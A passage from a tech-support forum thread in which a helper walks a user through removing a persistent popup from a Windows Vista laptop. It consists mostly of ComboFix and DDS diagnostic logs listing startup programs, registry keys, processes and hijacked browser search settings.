2011-12-13 04:20	3305760	----a-w-	c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
2012-02-21 01:28	59240	----a-w-	c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
2007-04-10 23:40	413696	----a-w-	c:\program files\Camera Assistant Software for Toshiba\traybar.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
2010-02-10 12:39	16040	----a-w-	c:\program files\Dell V305\dldtamon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
2010-02-10 12:39	672424	----a-w-	c:\program files\Dell V305\dldtmon.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
2007-11-26 21:00	188928	----a-w-	c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
2007-01-01 21:22	3739648	----a-w-	c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
2006-12-07 23:49	55416	----a-w-	c:\program files\Toshiba\TBS\HSON.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2012-03-27 09:09	421736	----a-w-	c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
2006-11-07 00:14	34352	----a-w-	c:\program files\Toshiba\Utilities\KeNotify.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
2009-06-18 07:08	1062184	----a-w-	c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
2009-02-27 06:22	2785608	----a-w-	c:\program files\Pando Networks\Media Booster\PMB.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28	421888	----a-w-	c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
2007-06-13 17:11	4489216	----a-w-	c:\windows\RtHDVCpl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
2007-05-29 00:39	1826816	----a-w-	c:\windows\SkyTel.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
2007-03-22 18:46	448632	----a-w-	c:\program files\Toshiba\SmoothView\SmoothView.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
2008-01-19 07:33	49664	----a-w-	c:\windows\Speech\Common\sapisvr.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
2006-11-10 16:35	90112	----a-w-	c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
2006-03-23 04:42	438272	----a-w-	c:\program files\Toshiba\Utilities\SVPWUTIL.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2009-03-20 11:36	1451304	----a-w-	c:\program files\Synaptics\SynTP\SynTPEnh.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
2007-03-29 17:39	411192	----a-w-	c:\program files\Toshiba\Power Saver\TPwrMain.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
2011-06-30 10:11	2648184	----a-w-	c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation	REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-30 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
.
2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2012-05-30 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
- c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
.
2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
- c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
LSP: c:\windows\system32\wpclsp.dll
TCP: DhcpNameServer = 192.168.1.1
FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-05-30 00:09
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ... 
.
scanning hidden autostart entries ... 
.
scanning hidden files ... 
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="YMP.Media"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
@Denied: (Read) (RestrictedCode)
@Denied: (Read) (LocalSystem)
@Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Read) (Administrators)
@SACL=(02 0001)
@Ace=(0x11) (1) (S-1-16-4096)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
@SACL=(02 0001)
"lastact"=dword:00003640
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
@SACL=(02 0001)
"srch_ebox"=dword:4785b178
"srch_hlt"=dword:47854ece
"clkstrm"=dword:4785b2dc
"boo"=dword:4785b2dc
"etpg70_21"=dword:47854ece
"sst"=dword:47854ecf
"mess"=dword:4785b2dc
"mess_off"=dword:4785b2dc
"yma"=dword:47854eda
"mus"=dword:47854edb
"wik"=dword:47854edb
"vis_srch70"=dword:4785abea
"cacheldr"=dword:4785b2dc
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
@SACL=(02 0001)
"srch"=dword:4785abec
"vis_srch70"=dword:4785abec
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
@SACL=(02 0001)
"LastPoll_200"=dword:00041537
"resfeed"=dword:00000002
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
@SACL=(02 0001)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies\exe4j]
"InstallStarted"=dword:00000000
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\jlGui 3.0]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"UninstallString"="c:\\Windows\\system32\\javaws.exe -uninstall -prompt \"http://www.javazoom.com/jlgui/jws/jlgui3.0.jarjnlp\""
"DisplayName"="jlGui 3.0"
"DisplayIcon"="c:\\Users\\GAGAN\\AppData\\LocalLow\\Sun\\Java\\Deployment\\cache\\6.0\\57\\573addb9-2492e35c.ico"
"NoModify"=dword:00000001
"NoRepair"=dword:00000001
"Publisher"="Music Player for the Java(tm) Platform"
"Comments"="jlGui supports MP3, OGG VORBIS, FLAC, SPEEX, WAV, AIFF, AU audio formats. It ..."
"URLInfoAbout"="http://www.javazoom.net"
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\Microsoft\Windows\CurrentVersion\Webcheck\Store.1]
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
.
[HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\System\12a9d3cc-cd48-4c6b-a102-8b76a6f66e5a]
@Denied: (Full) (RestrictedCode)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
@Denied: (Full) (Administrators)
"bgu0fw0tDZx8jtqEjccbDg==
"=hex:45,75,92,1a,9f,09,c9,e9,d6,46,18,dd,5c,30,38,
96
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta]
@Denied: (Full) (Administrators)
@Denied: (Full) (Owner)
@Denied: (Full) (LocalSystem)
@Denied: (Full) (Administrators)
@Denied: (Full) (Users)
@SACL=
"PerceivedType"="text"
@="htafile"
"Content Type"="application/hta"
.
[HKEY_LOCAL_MACHINE\software\Classes\.hta\PersistentHandler]
@="{eec97550-47a9-11cf-b952-00aa0051fe20}"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Microsoft Security Client\MsMpEng.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\agrsmsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\progra~1\mcafee\SITEAD~1\mcsacore.exe
c:\program files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
c:\windows\system32\rundll32.exe
c:\windows\System32\tcpsvcs.exe
c:\program files\TeamViewer\Version6\TeamViewer_Service.exe
c:\program files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
c:\windows\system32\TODDSrv.exe
c:\program files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
c:\program files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
c:\program files\TeamViewer\Version6\TeamViewer.exe
c:\program files\Synaptics\SynTP\SynToshiba.exe
c:\program files\iPod\bin\iPodService.exe
c:\windows\system32\mshta.exe
c:\program files\Synaptics\SynTP\SynTPHelper.exe
c:\program files\Yahoo!\Messenger\ymsgr_tray.exe
c:\windows\system32\mshta.exe
.
**************************************************************************
.
Completion time: 2012-05-30 00:16:00 - machine was rebooted
ComboFix-quarantined-files.txt 2012-05-30 04:15
ComboFix2.txt 2012-05-29 18:01
ComboFix3.txt 2012-05-29 02:55
.
Pre-Run: 29,436,858,368 bytes free
Post-Run: 29,280,116,736 bytes free
.
- - End Of File - - 443FBEB5CCBB3C0435B8375034C71986


----------



## gagraptor (May 23, 2012)

the popup is still there not gone yet


----------



## Mark1956 (May 7, 2011)

Ok, the Combofix log is not showing any further entries relating to the popup, please run both Malwarebytes and DDS again and post the logs, that should show us what has been missed.


----------



## gagraptor (May 23, 2012)

also when i run combo fix i get a message that says pev.3xe and pev.exe has stopped working

P.S i reran combo fix as i forgot defogger i edited the last log


----------



## Mark1956 (May 7, 2011)

I still need to see the logs asked for in my last post. Please don't edit logs in previous posts as I may need to refer back to them, or run repeat scans when I have not requested them .

Defogger only needs to be run once to disable any CD emulation software, it does not need to be run every time you use Combofix. Any emulation software will remain disabled until Defogger is run again and set to re-enable them.

Please continue with running Malwarebytes and DDS and post the logs.

The pev.exe and pev.3xe files are part of Combofix but it can run ok without them. If any other error messages pop up please tell me.


----------



## gagraptor (May 23, 2012)

.
DDS (Ver_2011-08-26.01) - NTFSx86 
Internet Explorer: 8.0.6001.19222 BrowserJavaVersion: 10.3.1
Run by GAGAN at 0:39:32 on 2012-05-31
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.1121 [GMT -4:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\agrsmsvc.exe
C:\Windows\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Windows\system32\rundll32.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\tcpsvcs.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\DivX\DivX Update\DivXUpdate.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Windows\system32\TODDSrv.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Windows\system32\svchost.exe -k iissvcs
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Synaptics\SynTP\SynToshiba.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\TeamViewer\Version6\TeamViewer.exe
C:\Windows\system32\mshta.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Windows\System32\alg.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
uURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: H - No File
BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
BHO: Skype add-on (mastermind): {22bf413b-c6d2-4d91-82a9-a0f997ba588c} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\programdata\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
BHO: DivX Plus Web Player HTML5 : {326e768d-4182-46fd-9c16-1449a49795f4} - c:\program files\divx\divx plus web player\ie\divxhtml5\DivXHTML5.dll
BHO: Windows Live ID Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\oracle\javafx 2.0 runtime\bin\jp2ssv.dll
BHO: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: Veoh Browser Plug-in: {d0943516-5076-4020-a3b5-aefaf26ab263} - c:\program files\veoh networks\veoh\plugins\reg\VeohToolbar.dll
TB: Veoh Web Player Video Finder: {0fbb9689-d3d7-4f7a-a2e2-585b10099bfc} - c:\program files\veoh networks\veohwebplayer\VeohIEToolbar.dll
TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
TB: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [Yahoo! Pager] "c:\progra~1\yahoo!\messen~1\YAHOOM~1.EXE" -quiet
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [Skytel] Skytel.exe
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 8.0\reader\Reader_sl.exe"
mRun: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
mRun: [DivXUpdate] "c:\program files\divx\divx update\DivXUpdate.exe" /CHECKNOW
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
dRun: [Picasa Media Detector] c:\program files\picasa2\PicasaMediaDetector.exe
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
mPolicies-system: EnableLinkedConnections = 1 (0x1)
IE: {77BF5300-1474-4EC7-9980-D32B190E9B07} - {77BF5300-1474-4EC7-9980-D32B190E9B07} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
LSP: c:\windows\system32\wpclsp.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{AA0BA040-CE6A-4F94-8BD1-7AFDC60B8156} : DhcpNameServer = 192.168.1.1
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\gagan\appdata\roaming\mozilla\firefox\profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
FF - plugin: c:\program files\mcafee\siteadvisor\NPMcFFPlg32.dll
FF - plugin: c:\program files\microsoft silverlight\4.1.10329.0\npctrlui.dll
FF - plugin: c:\program files\mozilla firefox\plugins\npPandoWebInst.dll
FF - plugin: c:\program files\oracle\javafx 2.0 runtime\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\veoh networks\veoh\plugins\noreg\NPVeohVersion.dll
FF - plugin: c:\program files\veoh networks\veohwebplayer\npWebPlayerVideoPluginATL.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprpchromebrowserrecordext.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
FF - plugin: c:\users\gagan\appdata\local\google\update\1.3.21.111\npGoogleUpdate3.dll
FF - plugin: c:\users\gagan\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgoogletalk.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgtpo3dautoplugin.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_235.dll
FF - plugin: c:\windows\system32\npDeployJava1.dll
FF - plugin: c:\windows\system32\npmproxy.dll
.
---- FIREFOX POLICIES ----
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2012-3-20 171064]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2011-5-24 95200]
R2 TeamViewer6;TeamViewer 6;c:\program files\teamviewer\version6\TeamViewer_Service.exe [2011-1-27 2253688]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-6-19 21504]
